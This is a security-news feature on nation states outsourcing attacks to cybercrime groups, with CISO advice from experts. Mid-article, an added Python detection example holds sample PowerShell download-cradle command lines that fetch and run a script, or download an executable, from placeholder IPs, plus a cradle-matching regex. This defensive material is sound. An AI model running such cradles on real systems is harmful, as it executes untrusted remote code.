Features 31.10.2024
Trouble Squared: What Happens When Nation States and Cyber Criminals Work Together?
Reports claim that the majority of attributable malware-based attacks are now state-sponsored. What does this mean for CISOs?
There was a time when nation-state threats were very much the exception rather than the rule. But time moves quickly in cyberspace. A recent Netskope report claims that the majority of attributable malware-based attacks are now state-sponsored. While that may be an exaggeration, it’s certainly true that emboldened hostile nations are increasingly active in the digital realm. And they’re always on the hunt for new ways to make their campaigns more effective.
A new report from Microsoft claims that, over the past year, state-sponsored actors have been using cybercrime tactics, techniques, and procedures (TTPs) and occasionally even outsourcing their work to criminal groups. The question for CISOs is whether it really matters who attacks them if they follow industry best practices to mitigate cyber risk across the attack surface.
Microsoft’s Digital Defense Report 2024 details several ways the once distinct lines between state-sponsored threats and cybercrime are blurring. First, they’re conducting threat campaigns for financial gain. This is nothing new. North Korean actors have been targeting cryptocurrency exchanges and financial institutions for years to obtain funds for the Kim Jong-un regime and its missile programme. The UN estimates North Korean hackers have stolen over $3bn in digital currency since 2017, a third of which came last year.
Microsoft claims that the North Korean Jade Sleet, Sapphire Sleet, and Citrine Sleet groups have been particularly prolific, and there are signs that a fourth—Moonstone Sleet—is targeting organisations with custom ransomware. In a departure from previous tactics, it says Iran is also getting in on the game. Threat actors behind the Cotton Sandstorm data-stealing campaign apparently offered to remove individual victims’ data from their repository for a fee.
The report also claims Russian state-backed threat actors are using cybercrime TTPs such as commodity malware and outsourcing some operations to criminal gangs. A group profiled as Storm-2049 (UAC-0184) reportedly compromised dozens of Ukrainian military devices in a June campaign with “no obvious cybercriminal use.” A year earlier, the Aqua Blizzard state group reportedly “handed off” access to 34 compromised Ukrainian devices to cybercrime group Storm-0593 (aka Invisimole).
“The hand-off occurred when Aqua Blizzard invoked a PowerShell script that downloaded software from a Storm0593-controlled server. Storm-0593 then established command and control infrastructure and deployed Cobalt Strike beacons on most of the devices for follow-on activity,” the report notes. “This beacon was configured with the domain dashcloudew.uk, which Microsoft assesses Storm-0593 registered and used in a previous spear-phishing campaign against Ukrainian military machines last year, suggesting a pattern by Storm-0593 of supporting state intelligence collection objectives.”
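The hand-off described above has a detectable shape: a PowerShell download cradle on a host, followed shortly afterwards by a connection to a destination the organisation does not normally talk to. The following is an added example of correlating those two signals over constructed telemetry; it is not code from the report or from Microsoft, and the hosts, timestamps, addresses, domains and allow-list are all made up for illustration.

```python
"""Correlate a PowerShell download cradle with follow-on C2-style traffic.
Added example; every event below is constructed, not real telemetry."""
import re
from datetime import datetime, timedelta

# Constructed sample events: (host, timestamp, kind, detail). In practice
# these would come from process-creation and network-connection telemetry.
SAMPLE_EVENTS = [
    ("WS01", "2024-06-03T09:00:05", "process",
     "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
     ".DownloadString('http://203.0.113.7/s.ps1')\""),
    ("WS01", "2024-06-03T09:04:40", "netconn", "beacon.example.invalid:443"),
    ("WS02", "2024-06-03T10:15:00", "process",
     "powershell.exe -File C:\\scripts\\inventory.ps1"),
    ("WS02", "2024-06-03T10:20:00", "netconn", "updates.example.com:443"),
    ("WS03", "2024-06-03T11:00:00", "process",
     "powershell.exe -c \"Invoke-WebRequest -Uri http://203.0.113.9/x.exe "
     "-OutFile C:\\Users\\Public\\x.exe\""),
]

# Common download-cradle markers seen in PowerShell command lines.
CRADLE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient", re.I)
# Destinations the organisation expects to see (constructed allow-list).
KNOWN_GOOD = {"updates.example.com"}


def find_handoffs(events, window_minutes=15):
    """Return (host, cradle_time, destination) for every host where a
    PowerShell download cradle is followed within `window_minutes` by a
    connection to a destination outside the allow-list."""
    hits, last_cradle = [], {}
    for host, ts, kind, detail in sorted(events, key=lambda e: e[1]):
        t = datetime.fromisoformat(ts)
        if kind == "process" and "powershell" in detail.lower() and CRADLE.search(detail):
            last_cradle[host] = t            # remember the cradle per host
        elif kind == "netconn" and host in last_cradle:
            dest = detail.rsplit(":", 1)[0]  # strip the port
            if dest not in KNOWN_GOOD and t - last_cradle[host] <= timedelta(minutes=window_minutes):
                hits.append((host, last_cradle[host].isoformat(), dest))
    return hits


if __name__ == "__main__":
    for hit in find_handoffs(SAMPLE_EVENTS):
        print("possible hand-off:", hit)
```

On the constructed sample only WS01 is flagged: WS02 ran a local script with no cradle, and WS03 downloaded something but made no follow-on connection within the window.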
These trends have been bubbling away for some time. An HP report compiled by Surrey University senior lecturer Michael McGuire claimed in 2021 that some nation states “are recruiting cybercriminals to act as proxies to further their interests.” It added that analysis of a sample of state-backed attacks from 2010-2020 revealed that half featured “low budget, straightforward tools” that could be bought on dark web cybercrime sites. That compares to just a fifth that featured more sophisticated homegrown malware and exploits.
However, outsourcing threat activity to third-party groups appears to be gaining traction. In February, leaked documents revealed the extent to which private contractor I-Soon has been working as a de facto hacker-for-hire to do the dirty work of China’s Ministry of Public Security.
According to Surrey University cybersecurity professor Alan Woodward, nation-states have several reasons to outsource work this way. The most obvious is plausible deniability.
“If accused by the international community, the nation behind an attack can always say it wasn’t them. This becomes even more plausible if the attack is such that it both disrupts and makes money,” he tells Assured Intelligence. “In the past, attacks tended to be motivated by one or the other, but ransomware, for example, has evolved to the point where it takes services down for weeks and potentially brings in money, which can be distributed via money mules into hard currency.”
Woodward says that using criminal TTPs like ransomware-as-a-service also means that even if a government launches an attack, it will simply look as if it were carried out by a criminal entity, as it will be using the same infrastructure.
“If you manage to track the attacks back to the source, it is usually some bulletproof host and nothing to do with a particular nation,” he adds. “It’s easier than ever to remotely engage criminals to conduct attacks – in fact, some crime gangs may never have met each other, never mind the state commissioning them. You can be anyone you like online.”
In many ways, it’s a continuation of a trend fomented during the Cold War, where governments on either side of the Iron Curtain used mercenaries as proxies to do their bidding in a way that helped them avoid diplomatic pressure, Woodward explains.
Should CISOs be concerned? Such tactics are certainly helping nation-states expand their operations and arguably victimise a growing number of blameless non-government entities. But there’s also an argument for saying this won’t change much from a risk management perspective.
“The one bonus of states using crime as a service is that it tends to be malware that has been seen before. So, CISOs should look to the main threat analysis, construct their defences accordingly, and not be overly worried about nation-state attacks which might use something they’ve not prepared for,” argues Woodward.
“Having said that, one tactic is to use crime-as-a-service attacks as a diversion and use the really sophisticated attack to penetrate a high-value target. As a CISO dealing with an attack, you might ask yourself what else this attack might cover. Even common DDoS attacks were used this way.”
Getting the basics right is the best course of action, says Woodward.
“The vast majority of successful attacks are still achieved through social engineering. Basics like multi-factor authentication (MFA) can go a long way to stymie attackers. Plus, of course, education. Have your users practice your ABC: assume nothing, believe no one and check everything,” he advises.
“CISOs also need to understand their truly valuable data assets and pay particular attention to them – including the possibility of a minor breach being used to move from less well-guarded to highly guarded areas. Partition your network and don’t allow universal access. States looking to steal IP are very good at getting through the castle gate and feeling their way around the network until they access the keep holding your Crown Jewels.”
Netskope’s EMEA CISO, Neil Thacker, agrees that best practice cyber hygiene is an excellent first step but adds that it is insufficient alone.
“With an understanding of who might be targeting your organisation, you can then build a resilient infrastructure that provides visibility over data flows, can identify and block threats, and minimise downtime in the event of a cyber attack,” he tells Assured Intelligence.
“Develop a roadmap for advanced security controls. Consider threat modelling, anomaly detection, continuous monitoring, and behavioural detection to identify suspicious data movements across cloud environments.”
Thacker adds that such efforts must be accompanied by continuous refinement and adaptation, which is where understanding specific attackers and their TTPs can be helpful.
“Regularly evaluate the effectiveness of your security measures. Adapt and refine them based on real-world experiences and emerging threats. Stay on top of the latest security threat data and trends and adapt security measures accordingly,” he concludes.
With a flexible approach that responds to changing threat landscape trends, CISOs can be more confident that their defensive efforts will pass muster. Ultimately, it means that, regardless of who is behind the latest assault, the risk can be effectively neutralised.